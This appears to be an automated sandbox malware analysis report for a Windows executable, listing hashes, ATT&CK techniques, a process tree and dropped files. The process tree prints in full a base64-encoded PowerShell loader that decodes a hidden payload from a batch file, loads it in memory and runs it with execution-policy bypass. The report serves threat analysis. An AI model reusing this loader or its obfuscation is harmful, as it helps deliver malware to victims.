cce988ce6f528e02009122396aa4149091dbee5fbe8bcaabffaaa88ae02b127a

General

Target

cce988ce6f528e02009122396aa4149091dbee5fbe8bcaabffaaa88ae02b127a.exe
Size

521KB
MD5

068c05b9f062da142d266a374866d3bb
SHA1

315726e1015e1e69cf9645bda713f463e93a8755
SHA256

cce988ce6f528e02009122396aa4149091dbee5fbe8bcaabffaaa88ae02b127a
SHA512

25358882e596ed9299ef714e2168a70e7bceace7fafc9f61e10e2fb58b480b97f31af86ef08e553cfe69546aa8b056b09df696d5fa9e07e2784392e8bbd87156
SSDEEP

12288:xfL5njsVlNucSkkMxi+FAbPr+rr6K+u03mlw0lsp5ie:xfL5njMnOMxw26KY3t0lOAe

Score

6^/10

discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2428	powershell.exe
2200	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cce988ce6f528e02009122396aa4149091dbee5fbe8bcaabffaaa88ae02b127a.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2428	powershell.exe
2200	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2428	powershell.exe
Token: SeDebugPrivilege	2200	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2064 wrote to memory of 2524	2064	cce988ce6f528e02009122396aa4149091dbee5fbe8bcaabffaaa88ae02b127a.exe	30
PID 2064 wrote to memory of 2524	2064	cce988ce6f528e02009122396aa4149091dbee5fbe8bcaabffaaa88ae02b127a.exe	30
PID 2064 wrote to memory of 2524	2064	cce988ce6f528e02009122396aa4149091dbee5fbe8bcaabffaaa88ae02b127a.exe	30
PID 2064 wrote to memory of 2524	2064	cce988ce6f528e02009122396aa4149091dbee5fbe8bcaabffaaa88ae02b127a.exe	30
PID 2524 wrote to memory of 2624	2524	wscript.exe	31
PID 2524 wrote to memory of 2624	2524	wscript.exe	31
PID 2524 wrote to memory of 2624	2524	wscript.exe	31
PID 2524 wrote to memory of 2624	2524	wscript.exe	31
PID 2624 wrote to memory of 2428	2624	cmd.exe	33
PID 2624 wrote to memory of 2428	2624	cmd.exe	33
PID 2624 wrote to memory of 2428	2624	cmd.exe	33
PID 2624 wrote to memory of 2428	2624	cmd.exe	33
PID 2624 wrote to memory of 2200	2624	cmd.exe	34
PID 2624 wrote to memory of 2200	2624	cmd.exe	34
PID 2624 wrote to memory of 2200	2624	cmd.exe	34
PID 2624 wrote to memory of 2200	2624	cmd.exe	34

C:\Users\Admin\AppData\Local\Temp\cce988ce6f528e02009122396aa4149091dbee5fbe8bcaabffaaa88ae02b127a.exe
"C:\Users\Admin\AppData\Local\Temp\cce988ce6f528e02009122396aa4149091dbee5fbe8bcaabffaaa88ae02b127a.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2064
- C:\Windows\SysWOW64\wscript.exe
  "wscript.exe" "C:\Users\Admin\start.vbs"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2524
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\temp.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2624
  - - C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4LDIzOCwyMjQsMjMyLDIyMSwyMzEsMjQ0LDE2OSwxOTIsMjMzLDIzOSwyMzcsMjQ0LDIwMywyMzQsMjI4LDIzMywyMzksMTY5LDE5NiwyMzMsMjQxLDIzNCwyMzAsMjI0LDE2MywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NCwxODIpDQokZGVjb2RlZFN0cmluZyA9IENvbnZlcnQtQXNjaWlUb1N0cmluZyAkZW5jb2RlZEFycmF5DQoNCg0KJGZpbGVQYXRoID0gSm9pbi1QYXRoICRlbnY6VXNlclByb2ZpbGUgIlVuZExkbC5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\Admin\UndLdl.ps1' -Encoding UTF8"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2428
  - - C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\UndLdl.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2200

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
09e570da04da4ce599e0334d2823e89e

SHA1
24c7c8453ac601ef5c12e668fff16fc31aedb282

SHA256
3709e1afaff47c4a31b217b44d04dd44f796070dc0108402e504b6061377c7a4

SHA512
db36ec703bc0b7f910278a7c393b98a37c79f35728128ed3b19ae105406f2eabbd479a7e050a1cd6d732652306143065faa3f65963c7fc5013562cddf25aa1ac

Download Submit
C:\Users\Admin\UndLdl.ps1

Filesize
1KB

MD5
6707df486205804693821eebad4c03f3

SHA1
fb4e723b632090036463d44e58ecedef4b688958

SHA256
cd78d5da40004dbaa8688d97063d1c9b3cee41ba72e8f9152ee38d86cf6efb50

SHA512
4b497ee77faeddae306b69a45641ab8f11ebbd9712664a614be009d6ab9632cb05f2025ae9631cb51801a4f6c2e3d48b38082b9b5fca41241ec5a0088c9e88ef

Download Submit
C:\Users\Admin\start.vbs

Filesize
231B

MD5
abe1dd23ab4c11aae54f1898c780c0b5

SHA1
bb2f974b3e0af2baa40920b475582bfd4fb28001

SHA256
89054e19532a9a62ca3403a8899495bf6f06557ff886b475a04227eb8aba7b12

SHA512
e9ec437a32301078ea69ce2f36dadab68315d5e56d94c4d579d3409ccbe0c9e00c3aed7baa0fa6d656fb8ed23213f4c01fb2d108c1a0ed11c58c76cd00f9a99d

Download Submit
C:\Users\Admin\temp.bat

Filesize
545KB

MD5
1ab2d7cc96ad2b86edf74d5497b45def

SHA1
baac72428aaff76788b6e0056b720c6920d0e6f8

SHA256
1e23a11308681733cff73f23933670c4350cec867042bbe5f7ff54a6dcc1dd83

SHA512
8b5a456b4a4c97e28b6e90735eb9a006e8afbcd3d588e04b7bd3ab24e20ef80e37cc08412cc421c0f465c148f5b1c181ea798585865bd82f9861c1a7351194a1

Download Submit

Analysis

Sharing